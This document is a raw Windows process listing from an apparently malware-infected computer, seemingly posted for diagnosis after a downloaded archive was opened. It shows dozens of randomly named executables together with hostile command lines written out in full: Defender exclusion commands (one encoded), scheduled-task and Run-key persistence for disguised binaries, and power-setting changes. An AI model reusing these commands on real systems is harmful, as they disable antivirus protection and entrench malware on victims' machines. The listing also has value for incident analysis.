chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-window=0 < \\.\pipe\
chrome.nativeMessaging.in.c416c07d4f912804 > \\.\pipe\
chrome.nativeMessaging.out.c416c07d4f912804
===============
ID: 22096, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 30824, Name: browserhost.exe, CommandLine: "C:\Program Files\McAfee\WebAdvisor\
BrowserHost.exe" chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-
window=0
===============
ID: 29924, Name: browserhost.exe, CommandLine: "C:\Program Files\McAfee\WebAdvisor\
BrowserHost.exe" chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/ --parent-
window=0
===============
ID: 22772, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService
--lang=es-419 --service-sandbox-type=audio --mojo-platform-channel-handle=3492 --
field-trial-handle=2064,i,7741522595699167436,8666959540695824112,131072
/prefetch:8
===============
ID: 28016, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --flag-switches-begin --flag-switches-end --no-startup-
window /prefetch:5
===============
ID: 27584, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\usuario\
AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-
annotation=ptype=crashpad-handler "--database=C:\Users\usuario\AppData\Local\
Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\usuario\AppData\Local\
Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --
annotation=chromium-version=105.0.5195.127 "--annotation=exe=C:\Program Files
(x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--
annotation=prod=Microsoft Edge" --annotation=ver=105.0.1343.42 --initial-client-
data=0x10c,0x110,0x114,0xec,0x1ac,0x7ffc75445850,0x7ffc75445860,0x7ffc75445870
===============
ID: 23000, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=gpu-process --gpu-
preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAA
AOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-
handle=2076 --field-trial-
handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:2
===============
ID: 30104, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=network.mojom.NetworkService --lang=es-419 --service-sandbox-type=none --mojo-
platform-channel-handle=2272 --field-trial-
handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:3
===============
ID: 29728, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=storage.mojom.StorageService --lang=es-419 --service-sandbox-type=utility --
mojo-platform-channel-handle=2640 --field-trial-
handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:8
===============
ID: 31012, Name: msedge.exe, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\
Application\msedge.exe" --type=utility --utility-sub-
type=password_manager.breach_detection.mojom.EdgePasswordDataProcessor --lang=es-
419 --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-
trial-handle=2228,i,4499709946258424554,4730033275178688628,131072 /prefetch:8
===============
ID: 26204, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=58 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256496037006 --mojo-platform-channel-handle=5612 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 32044, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=64 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256647299634 --mojo-platform-channel-handle=4848 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 32692, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=66 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256654677188 --mojo-platform-channel-handle=5192 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 31492, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=71 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256671420296 --mojo-platform-channel-handle=5820 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 31728, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=72 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256671853225 --mojo-platform-channel-handle=1640 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 30964, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe
-Embedding
===============
ID: 31960, Name: chrome.exe, CommandLine: "C:\Program Files (x86)\Google\Chrome\
Application\chrome.exe" --type=renderer --display-capture-permissions-policy-
allowed --lang=es-419 --device-scale-factor=1 --num-raster-threads=1 --renderer-
client-id=74 --time-ticks-at-unix-epoch=-1681672103653583 --launch-time-
ticks=256704518338 --mojo-platform-channel-handle=6684 --field-trial-
handle=2064,i,7741522595699167436,8666959540695824112,131072 /prefetch:1
===============
ID: 29480, Name: WinRAR.exe, CommandLine: "C:\Program Files\WinRAR\WinRAR.exe" "C:\
Users\usuario\Downloads\File.7z"
===============
ID: 30800, Name: PXm4WEFjtA_1sDb1cI22p0Qy.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\PXm4WEFjtA_1sDb1cI22p0Qy.exe"
===============
ID: 30232, Name: aSv5jWu4Et1psm6MDp17yUgI.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\aSv5jWu4Et1psm6MDp17yUgI.exe"
===============
ID: 24100, Name: 9oLffSy8FP46v9leLGnqUAdi.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\9oLffSy8FP46v9leLGnqUAdi.exe"
===============
ID: 11196, Name: ki218682.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP000.TMP\ki218682.exe
===============
ID: 31380, Name: ki226728.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP001.TMP\ki226728.exe
===============
ID: 25692, Name: ki805887.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP002.TMP\ki805887.exe
===============
ID: 20016, Name: ki308070.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP003.TMP\ki308070.exe
===============
ID: 33372, Name: csgo.exe, CommandLine: "C:\Program Files (x86)\Steam\steamapps\
common\Counter-Strike Global Offensive\csgo.exe" -steam
===============
ID: 33640, Name: 25RDBqzXvxhBSbf7DXIQa7NM.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\25RDBqzXvxhBSbf7DXIQa7NM.exe"
===============
ID: 33648, Name: bs6mZ0nMyiZQ26p7F2HzaU6U.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\bs6mZ0nMyiZQ26p7F2HzaU6U.exe"
===============
ID: 33656, Name: 8ZCErKNOXLgSDsCfSlij4DqA.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\8ZCErKNOXLgSDsCfSlij4DqA.exe"
===============
ID: 33664, Name: ugZ7xUURpx8kpWnOOdSsCYfT.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ugZ7xUURpx8kpWnOOdSsCYfT.exe"
===============
ID: 32020, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 33128, Name: msfeedssync.exe, CommandLine: C:\Windows\system32\msfeedssync.exe
sync
===============
ID: 29292, Name: ss31.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
ss31.exe"
===============
ID: 32420, Name: ZZpmfDkgpO8SkXgneLOcwcl6.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ZZpmfDkgpO8SkXgneLOcwcl6.exe"
===============
ID: 30840, Name: uyQCgtyEW1opCFJTj35sr22z.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\uyQCgtyEW1opCFJTj35sr22z.exe"
===============
ID: 33760, Name: 4Hj9k71oR6U4pkzK_wvK7UkB.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\4Hj9k71oR6U4pkzK_wvK7UkB.exe"
===============
ID: 33184, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 28344, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 22968, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 30956, Name: EJQC6ecu9h.exe, CommandLine: "C:\Users\usuario\AppData\Roaming\
KlTtYHyHOa6\EJQC6ecu9h.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 22600, Name: backgroundTaskHost.exe, CommandLine: "C:\WINDOWS\system32\
backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
===============
ID: 21916, Name: oneetx.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
10180c8ca3\oneetx.exe"
===============
ID: 34148, Name: node.exe, CommandLine: node.exe node.lib 3956101466505 1928975631
===============
ID: 34212, Name: 688A.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
688A.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 33632, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\3cc18b03-
2ef6-40e5-9c25-191d7c1fba7a\build2.exe"
===============
ID: 27564, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\6c712fc4-
3d05-40c0-820c-4bf6c7ac5fd7\build2.exe"
===============
ID: 33924, Name: gRBrlCK.exe, CommandLine: "C:\Users\usuario\AppData\Roaming\
A4tmSbJUZNs\gRBrlCK.exe"
===============
ID: 33868, Name: IGCC.exe, CommandLine: "C:\Program Files\WindowsApps\
AppUp.IntelGraphicsExperience_1.100.3408.0_x64__8j3eq9eme6ctt\IGCC.exe" -
ServerName:App.AppXxq4ar3drev924dxqnatpa4s48c4zrxd1.mca
===============
ID: 28116, Name: bu453998.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP004.TMP\bu453998.exe
===============
ID: 34000, Name: 9DD8.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
9DD8.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 33300, Name: 99D0.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
99D0.exe" --Admin IsNotAutoStart IsNotTask
===============
ID: 31568, Name: powershell.exe, CommandLine: C:\WINDOWS\System32\
WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath
@($env:UserProfile, $env:ProgramFiles) -Force
===============
ID: 27248, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 34624, Name: ZKLRkuoVGDbkA5t8TPfQz_PQ.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ZKLRkuoVGDbkA5t8TPfQz_PQ.exe"
===============
ID: 34648, Name: VzARbluXWuUf0OH30Qt76n75.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\VzARbluXWuUf0OH30Qt76n75.exe"
===============
ID: 34684, Name: 5_jQHaxjVebVFwRL4PH5PIz2.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\5_jQHaxjVebVFwRL4PH5PIz2.exe"
===============
ID: 33476, Name: _JaAk2ybrEXX0v8vLMLFpG3a.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\_JaAk2ybrEXX0v8vLMLFpG3a.exe"
===============
ID: 34308, Name: _XCo87uS0qd9A1lyYHzVozu6.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\_XCo87uS0qd9A1lyYHzVozu6.exe"
===============
ID: 33688, Name: EQI2Eb7SoqRS6VXt4enVT_xO.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\EQI2Eb7SoqRS6VXt4enVT_xO.exe"
===============
ID: 32852, Name: ciBd4tiq_jleSzWzLjOFI7hZ.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\ciBd4tiq_jleSzWzLjOFI7hZ.exe"
===============
ID: 32944, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 31768, Name: ki240035.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP005.TMP\ki240035.exe
===============
ID: 27712, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\7026e6da-
c39f-41f4-9908-bf3b913a2000\build2.exe"
===============
ID: 28252, Name: build2.exe, CommandLine: "C:\Users\usuario\AppData\Local\c60b24e6-
16a3-4df9-8525-2973fd6aeb19\build2.exe"
===============
ID: 31528, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 34396, Name: ki509348.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP006.TMP\ki509348.exe
===============
ID: 34948, Name: ki834237.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP007.TMP\ki834237.exe
===============
ID: 35084, Name: ki026260.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP008.TMP\ki026260.exe
===============
ID: 35112, Name: Coek3uKK.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
RarSFX0\Coek3uKK.exe"
===============
ID: 91272, Name: powershell.exe, CommandLine: C:\WINDOWS\System32\
WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object
Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurren
t())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
{ IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2")
{ schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn
'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' }
Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program
Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup)
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -
DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -
ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC'
-User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\
Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d
'C:\Program Files\Notepad\Chrome\updater.exe' }
===============
ID: 91336, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 91860, Name: bu053088.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
IXP009.TMP\bu053088.exe
===============
ID: 91192, Name: mstsca.exe, CommandLine: C:\Users\usuario\AppData\Roaming\
Microsoft\Network\mstsca.exe
===============
ID: 110356, Name: 6C96.exe, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
6C96.exe"
===============
ID: 112680, Name: jsc.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework64\
v4.0.30319\jsc.exe"
===============
ID: 119320, Name: powershell.exe, CommandLine: C:\WINDOWS\System32\
WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object
Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurren
t())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
{ schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\
Chrome\updater.exe" }
===============
ID: 119368, Name: systeminfo.exe, CommandLine: systeminfo.exe /fo csv
===============
ID: 132348, Name: AppLaunch.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\AppLaunch.exe"
===============
ID: 132364, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 132372, Name: taskhostw.exe, CommandLine: taskhostw.exe
===============
ID: 132508, Name: schtasks.exe, CommandLine: /C /create /F /sc minute /mo 1 /tn
"Azure-Update-Task" /tr "C:\Users\usuario\AppData\Roaming\Microsoft\Network\
mstsca.exe"
===============
ID: 132640, Name: D4C3CF00DvXNXMEfWEATK6Ox.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\D4C3CF00DvXNXMEfWEATK6Ox.exe"
===============
ID: 132648, Name: wGApxRSHmLGJO4JekhNRAuf5.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\wGApxRSHmLGJO4JekhNRAuf5.exe"
===============
ID: 132656, Name: CmoqYNURke2pNIkfDCRhvV9L.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\CmoqYNURke2pNIkfDCRhvV9L.exe"
===============
ID: 132664, Name: EhXpyDq538kCb2CpGjnkHfSw.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\EhXpyDq538kCb2CpGjnkHfSw.exe"
===============
ID: 132676, Name: cJn0ixRGPfKuuO_zVciuuZmN.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\cJn0ixRGPfKuuO_zVciuuZmN.exe"
===============
ID: 132792, Name: 11.exe, CommandLine: "C:\Windows\Temp\11.exe"
===============
ID: 132880, Name: dllhost.exe, CommandLine: "C:\WINDOWS\system32\dllhost.exe"
===============
ID: 132908, Name: J0I6yR8Y31_IOnv2n2E6maWf.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\J0I6yR8Y31_IOnv2n2E6maWf.exe"
===============
ID: 132924, Name: 9GLNIVqrZk2y5RJvipO_OPOE.exe, CommandLine: "C:\Users\usuario\
Pictures\Minor Policy\9GLNIVqrZk2y5RJvipO_OPOE.exe"
===============
ID: 132948, Name: 22.exe, CommandLine: "C:\Windows\Temp\22.exe"
===============
ID: 133080, Name: is-5BF07.tmp, CommandLine: "C:\Users\usuario\AppData\Local\Temp\
is-0MD42.tmp\is-5BF07.tmp" /SL4 $4E0952 "C:\Users\usuario\Pictures\Minor Policy\
cJn0ixRGPfKuuO_zVciuuZmN.exe" 2562561 56320
===============
ID: 133112, Name: 123.exe, CommandLine: "C:\Windows\Temp\123.exe"
===============
ID: 27340, Name: wNpalt, CommandLine: C:\Users\usuario\AppData\Local\Temp\
sihEZnOegyfaETYZCu\wNpalt /mixtwo
===============
ID: 5632, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 103012, Name: WerFault.exe, CommandLine: C:\WINDOWS\SysWOW64\WerFault.exe -u -p
132792 -s 280
===============
ID: 107576, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 26084, Name: 321.exe, CommandLine: "C:\Windows\Temp\321.exe"
===============
ID: 33872, Name: cmd.exe, CommandLine: cmd.exe /d /c bwsjhihxsxf.bat 3956101466505
===============
ID: 34492, Name: WerFault.exe, CommandLine: C:\WINDOWS\SysWOW64\WerFault.exe -u -p
132948 -s 292
===============
ID: 35404, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 35428, Name: conhost.exe, CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0x4
===============
ID: 35580, Name: RegSvcs.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegSvcs.exe"
===============
ID: 35680, Name: WerFault.exe, CommandLine: C:\WINDOWS\SysWOW64\WerFault.exe -u -p
133112 -s 280
===============
ID: 35760, Name: AppLaunch.exe, CommandLine: "C:\\Windows\\Microsoft.NET\\
Framework\\v4.0.30319\\AppLaunch.exe"
===============
ID: 33944, Name: Install.exe, CommandLine: .\Install.exe
===============
ID: 34108, Name: Rec419.exe, CommandLine: "C:\Program Files (x86)\FKDsoftFR\Rec419\
Rec419.exe"
===============
ID: 35860, Name: oneetx.exe, CommandLine: C:\Users\usuario\AppData\Local\Temp\
10180c8ca3\oneetx.exe
===============
ID: 35956, Name: Install.exe, CommandLine: .\Install.exe /S /site_id "525403"
===============
ID: 35972, Name: ju6G8sJ0.exe, CommandLine: "C:\Users\usuario\AppData\Roaming\
ruIvbnl\ju6G8sJ0.exe"
===============
ID: 36336, Name: pKoLxd, CommandLine: C:\Users\usuario\AppData\Local\Temp\
nQfsPRITKCJxBJKOVa\pKoLxd
===============
ID: 36360, Name: forfiles.exe, CommandLine: "C:\Windows\System32\forfiles.exe" /p
c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\
Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0
/reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\
Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
===============
ID: 36404, Name: cmd.exe, CommandLine: "cmd.exe" /C powershell -EncodedCommand
"PAAjAHAAZQBqAEgAVgBIACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMATg
BhADAAQQAxADAAcQBLAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuA
HYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkA
IAA8ACMAWgBBADcAVQBDAEgAVQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBVAGwATgBwAFIAdQBjAHQAcQA
zACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-
dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 &
powercfg /hibernate off

You might also like